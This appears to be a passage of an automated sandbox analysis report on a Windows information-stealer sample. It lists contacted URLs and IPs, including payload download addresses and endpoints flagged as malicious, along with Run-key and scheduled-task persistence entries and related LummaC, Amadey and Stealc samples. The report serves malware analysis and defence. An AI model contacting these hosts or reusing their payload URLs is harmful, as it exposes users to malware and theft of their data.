                                                                                                                                              http://185.215.113.206/68b591d6548ec281/mozglue.dllDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://185.215.113.43/Zu7JuNko/index.php#skotes.exe, 00000012.00000003.6196394890.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/workshop/696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://login.steampowered.com/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.alljyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://store.steampowered.com/legal/696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://lev-tolstoi.com/oN696689ce6d.exe, 0000002F.00000002.4901441862.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://rapeflowwj.lat/api696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://185.215.113.43/Zu7JuNko/index.phpncodedSskotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://pancakedipyps.click/E64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoEdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://pancakedipyps.click/H64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://185.215.113.16/steam/random.exeEdYEXasNiR.exe, 00000000.00000003.1741566665.000000000192B000.00000004.00000020.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1742250638.000000000192C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://aka.ms/pscore6lBgqpowershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://rapeflowwj.lat/z696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://store.steampowered.com/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpserDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://github.comdcbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003067000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://127.0.0.1:27060696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://pancakedipyps.click/X64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown

                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                        Public IPs

                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                        142.250.186.35
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        142.250.186.46
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        185.215.113.43
                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                        172.67.157.254
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        1.1.1.1
                                                                                                                                                                                        		unknownAustralia
                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        104.21.32.1
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        172.217.18.3
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        104.21.18.19
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        185.215.113.16
                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                        140.82.121.3
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		36459GITHUBUSfalse
                                                                                                                                                                                        142.250.181.238
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        64.233.167.84
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                        188.114.96.3
                                                                                                                                                                                        		unknownEuropean Union
                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                        185.215.113.206
                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                        142.250.186.142
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                        142.250.184.228
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        185.199.110.133
                                                                                                                                                                                        		unknownNetherlands
                                                                                                                                                                                        		54113FASTLYUSfalse
                                                                                                                                                                                        142.250.186.138
                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                        31.41.244.11
                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                        		61974AEROEXPRESS-ASRUfalse

                                                                                                                                                                                        Private

                                                                                                                                                                                        IP
                                                                                                                                                                                        192.168.2.11
                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                        General Information

                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                        Analysis ID:1582828
                                                                                                                                                                                        Start date and time:2024-12-31 15:40:39 +01:00
                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                        Overall analysis duration:0h 20m 25s
                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                        Report type:full
                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                        Number of analysed new started processes analysed:110
                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                        Technologies:
                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                        Sample name:EdYEXasNiR.exe
                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                        Original Sample Name:0be97a686bb58f470d1d096a12097fa8.exe
                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                        Classification:mal100.phis.troj.spyw.expl.evad.winEXE@154/1065@0/23
                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                        • Successful, ratio: 66.7%
                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                        Warnings

                                                                                                                                                                                        • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                        • Execution Graph export aborted for target DX0TGIT2LZWIIEDZ8Y3A15R.exe, PID 2656 because there are no executed function
                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive

                                                                                                                                                                                        Simulations

                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                        09:42:07API Interceptor10x Sleep call for process: EdYEXasNiR.exe modified
                                                                                                                                                                                        09:42:55API Interceptor92x Sleep call for process: DX0TGIT2LZWIIEDZ8Y3A15R.exe modified
                                                                                                                                                                                        09:43:03API Interceptor13699730x Sleep call for process: skotes.exe modified
                                                                                                                                                                                        09:43:16API Interceptor107x Sleep call for process: powershell.exe modified
                                                                                                                                                                                        09:43:21API Interceptor8x Sleep call for process: 64252d274d.exe modified
                                                                                                                                                                                        09:43:30API Interceptor27x Sleep call for process: cbfb8a9c89.exe modified
                                                                                                                                                                                        09:43:36API Interceptor19x Sleep call for process: jyidkjkfhjawd.exe modified
                                                                                                                                                                                        09:47:12API Interceptor10x Sleep call for process: 696689ce6d.exe modified
                                                                                                                                                                                        15:42:33Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                        15:43:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                        15:43:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                        15:44:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe
                                                                                                                                                                                        15:44:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe
                                                                                                                                                                                        15:44:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe
                                                                                                                                                                                        15:45:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe
                                                                                                                                                                                        15:45:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe
                                                                                                                                                                                        15:45:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe
                                                                                                                                                                                        15:45:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe
                                                                                                                                                                                        15:45:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe
                                                                                                                                                                                        15:46:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run eIgpINK.exe C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe
                                                                                                                                                                                        15:46:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run eIgpINK.exe C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe

                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                        IPs

                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        185.215.113.43Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        o0cabS0OQn.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        mDuCbT8LnH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        LIWYEYWSOj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        Idau8QuYa3.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        oTZfvSwHTq.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        ZBbOXn0a3R.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                        172.67.157.254Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    5Z19n7XRT1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          Tqa1vDp9NT.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CLOUDFLARENETUSSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.87.65
                                                                                                                                                                                                            IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.129.82
                                                                                                                                                                                                            HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            https://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.139.222
                                                                                                                                                                                                            tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                            • 104.21.85.189
                                                                                                                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                            • 172.67.196.114
                                                                                                                                                                                                            Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                            WHOLESALECONNECTIONSNLSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                            zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                            CLOUDFLARENETUSSMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            DypA6KbLrn.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.87.65
                                                                                                                                                                                                            IOnqEVA4Dz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.129.82
                                                                                                                                                                                                            HngJMpDqxP.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            https://br.custmercompa.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.139.222
                                                                                                                                                                                                            tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                            • 104.21.85.189
                                                                                                                                                                                                            Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                            • 172.67.196.114
                                                                                                                                                                                                            Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            MJhe4xWsnR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 162.159.61.3

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            C:\ProgramData\freebl3.dll5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                                                                                              random.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                8WFJ38EJo5.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                    5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                                                                                      DRWgoZo325.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, VidarBrowse
